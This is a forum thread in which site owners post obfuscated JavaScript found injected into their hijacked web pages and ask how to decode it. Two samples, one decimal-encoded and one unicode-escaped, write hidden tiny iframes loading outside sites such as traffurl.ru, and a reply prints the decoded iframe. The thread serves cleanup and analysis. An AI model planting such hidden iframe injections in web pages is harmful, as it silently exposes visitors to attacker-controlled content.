I have no knowledge of programming... I can usually look through a script though and figure out what the idea is.
Recently several of my sites got hijacked and below is the code that was inserted, what I'm trying to do is to decode it to figure out what it's intent was and to see if it opened up any other holes in the server that I need to know about.
Maybe this is easy stuff... but I don't have a clue where to start ... -
<script language='JavaScript'>function nbsp() {var t,o,l,i,j;var s='';s+='060047116101120116097116101097062060047116101120116097114101097062'; s+='060073070082065077069032115114099061034104116116112058047047109097114099111098101114110097114100111';s=s+'110105046099111109047120047105110100101120046112104112034032119105100116104061051032104101105103104';s=s+'116061051032115116121108101061034100105115112108097121058110111110101034062060047073070082065077069';s=s+'062032';t='';l=s.length;i=0;while(i<(l-1)){for(j=0;j<3;j++){t+=s.charAt(i);i++;}if((t-unescape(0xBF))>unescape(0x00))t-=-(unescape(0x08)+unescape(0x30));document.write(String.fromCharCode(t));t='';}}nbsp();</script><!-- c4 -->
-
any help would be greatly appreciated.
TIA.
10 12248
Heya, KyredBone. Welcome to TSDN!
Have a look at this thread.
Ok... I looked at that and created a test.php on my server... I see the text box but it is empty... I'm guessing I've done something wrong... how much or what portion exactly do I need to put in -
document.getElementById("test").value = unescape('code goes here')
-
and also do I need the " ' " around the code goes here ?
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx. http://www.netdemon.net/haywyre/
Ok...once I saw you noted that it was obfuscated JS then I did some more research and found the site below that would decode it .... thx. http://www.netdemon.net/haywyre/
That thread dealt with a simple escaped string. Yours is a bit more complicated. That's why it wouldn't work.
Can anyone tell me about how to decode this script:
<script type="text/javascript">
document.write('\u003c\u0069\u0066\u0072\u0061\u00 6d\u0065\u0020\u0073\u0072\u0063\u003d\u0022\u0068 \u0074\u0074\u0070\u003a\u002f\u002f\u0074\u0072\u 0061\u0066\u0066\u0075\u0072\u006c\u002e\u0072\u00 75\u002f\u0073\u006c\u0069\u0076\u002f\u0069\u006e \u0064\u0065\u0078\u002e\u0070\u0068\u0070\u0022\u 0020\u0077\u0069\u0064\u0074\u0068\u003d\u0031\u00 20\u0068\u0065\u0069\u0067\u0068\u0074\u003d\u0031 \u0020\u0073\u0074\u0079\u006c\u0065\u003d\u0022\u 0076\u0069\u0073\u0069\u0062\u0069\u006c\u0069\u00 74\u0079\u003a\u0068\u0069\u0064\u0064\u0065\u006e \u003b\u0070\u006f\u0073\u0069\u0074\u0069\u006f\u 006e\u003a\u0061\u0062\u0073\u006f\u006c\u0075\u00 74\u0065\u0022\u003e\u003c\u002f\u0069\u0066\u0072 \u0061\u006d\u0065\u003e');
</script>
I encountered this on a friends page and removed it. I know it is associated with traffurl.ru. my "noscript" add on for Firefox blocked the site when I went to his web site which was how I figured out it was in his page but I cannot figure out a way to decode it to see what it is doing. Any help?
[PHP]
<iframe src="http://traffurl.ru/sliv/index.php" width=1 height=1 style="visibility:hidden;position:absolute"></iframe>
[/PHP]
Can anyone tell me about how to decode this script:
You've got the decoded version as posted by rnd me, but if you want to decode it yourself, here's a very easy way: replace the document.write with an alert.
Anyone can help me to decode this scripts? - dw_Inf.gw=dw_Inf.fn("\x77\x69\x6e\x64\x6f\x77\x2e\x6c\x6f\x63\x61\x74\x69\x6f\x6e");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
- dw_Inf.mg=dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x65\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x61\x72\x29');
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x68\x6f\x73\x74\x6e\x61\x6d\x65');
- dw_Inf.x0=function(){dw_Inf.fn('\x69\x66\x28\x21\x28\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x31\x32\x37\x2e\x30\x2e\x30\x2e\x31\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x3d\x3d\x22\x6c\x6f\x63\x61\x6c\x68\x6f\x73\x74\x22\x7c\x7c\x64\x77\x5f\x49\x6e\x66\x2e\x67\x77\x2e\x69\x6e\x64\x65\x78\x4f\x66\x28\x22\x64\x79\x6e\x2d\x77\x65\x62\x2e\x63\x6f\x6d\x22\x29\x21\x3d\x2d\x31\x29\x29\x61\x6c\x65\x72\x74\x28\x64\x77\x5f\x49\x6e\x66\x2e\x6d\x67\x29\x3b');dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');dw_Inf.fn('\x64\x77\x5f\x73\x63\x72\x6f\x6c\x6c\x65\x72\x73\x2e\x72\x65\x61\x64\x79\x3d\x74\x72\x75\x65\x3b');};
- dw_Inf.fn('\x64\x77\x5f\x49\x6e\x66\x2e\x78\x30\x28\x29\x3b');
Thanks advanced for all helps!!
First of all, welcome to Bytes!
What you can do is wrap those statements in strings and use document.write or alert to display. Those code snippets show as: - dw_Inf.gw=dw_Inf.fn("window.location");dw_Inf.ar=[65,32,108,105,99,101,110,115,101,32,105,115,32,114,101,113,117,105,114,101,100,32,102,111,114,32,97,108,108,32,98,117,116,32,112,101,114,115,111,110,97,108,32,117,115,101,32,111,102,32,116,104,105,115,32,99,111,100,101,46,32,83,101,101,32,84,101,114,109,115,32,111,102,32,85,115,101,32,97,116,32,100,121,110,45,119,101,98,46,99,111,109];
-
dw_Inf.mg=dw_Inf.fn('dw_Inf.get(dw_Inf.ar)');
-
dw_Inf.fn('dw_Inf.gw=dw_Inf.gw.hostname');
-
dw_Inf.x0=function(){dw_Inf.fn('if(!(dw_Inf.gw==""||dw_Inf.gw=="127.0.0.1"||dw_Inf.gw=="localhost"||dw_Inf.gw.indexOf("dyn-web.com")!=-1))alert(dw_Inf.mg);');dw_Inf.fn('dw_Inf.ready=true;');dw_Inf.fn('dw_scrollers.ready=true;');};
-
dw_Inf.fn('dw_Inf.x0();');
Hello Guys,
I have solved your problems - i have made a little tool in vb.net to decode and encode again - below you can find the link where u can see the video also how to use it.
adeelnokiastuffs.blogspot.com/2010/08/javascript-hexa-codes-decoder-and.html
if anything please email me at adeel.rizvi at yda.net.au
Sign in to post your reply or Sign up for a free account.
Similar topics
by: assaf |
last post by:
hi all
i am using PreEmptive Solutions dotfuscator (community edition).
and i am getting 'TypeLoadException' for a simple interface that i defined.
how can i debug an obfuscated application?
...
|
by: Newbie |
last post by:
How would I modify this form
to encode *all* the characters
in the 'source' textarea to the
'%xx' format & place result
code into the 'output' textarea?
(cross browser compatable)
Any help is...
|
by: tgh003 |
last post by:
I would be interested to hear how others are managing their javascript
(.js) files from the original code vs the obfuscated version they
publish to their site/webapp.
I currently manage 2 files,...
|
by: Asha |
last post by:
greetings, attach below are javascripts, if you notice there is a keyword called escape which encodes the entire file and pass onto another fill to be decoded.
here are my implementation for...
|
by: kpmassey |
last post by:
I am trying to use wget to retrieve web pages like this:
http://www.michigan-football.com/s/2006/cascades.htm
Visit it and view source to see the obfuscated javascript.
Is there any tool to...
|
by: kebal |
last post by:
hy friends.. please decode this script.
<script language="JavaScript"> ...
|
by: sureshl |
last post by:
JavaScript Experts,
I have the following HTML. How could I use JavaScript such that when a user clicks on the checkbox in each row the phone numbers and e-mail addresses are partially obfuscated...
|
by: isladogs |
last post by:
The next Access Europe meeting will be on Wednesday 7 Feb 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:30 (7.30PM).
In this month's session, the creator of the excellent VBE...
|
by: MeoLessi9 |
last post by:
I have VirtualBox installed on Windows 11 and now I would like to install Kali on a virtual machine. However, on the official website, I see two options: "Installer images" and "Virtual machines"....
|
by: DolphinDB |
last post by:
Tired of spending countless mintues downsampling your data? Look no further!
In this article, you’ll learn how to efficiently downsample 6.48 billion high-frequency records to 61 million...
|
by: Aftab Ahmad |
last post by:
Hello Experts!
I have written a code in MS Access for a cmd called "WhatsApp Message" to open WhatsApp using that very code but the problem is that it gives a popup message everytime I clicked on...
|
by: ryjfgjl |
last post by:
ExcelToDatabase: batch import excel into database automatically...
|
by: isladogs |
last post by:
The next Access Europe meeting will be on Wednesday 6 Mar 2024 starting at 18:00 UK time (6PM UTC) and finishing at about 19:15 (7.15PM).
In this month's session, we are pleased to welcome back...
|
by: marcoviolo |
last post by:
Dear all,
I would like to implement on my worksheet an vlookup dynamic , that consider a change of pivot excel via win32com, from an external excel (without open it) and save the new file into a...
|
by: Vimpel783 |
last post by:
Hello!
Guys, I found this code on the Internet, but I need to modify it a little. It works well, the problem is this: Data is sent from only one cell, in this case B5, but it is necessary that data...
|
by: ArrayDB |
last post by:
The error message I've encountered is; ERROR:root:Error generating model response: exception: access violation writing 0x0000000000005140, which seems to be indicative of an access violation...
| |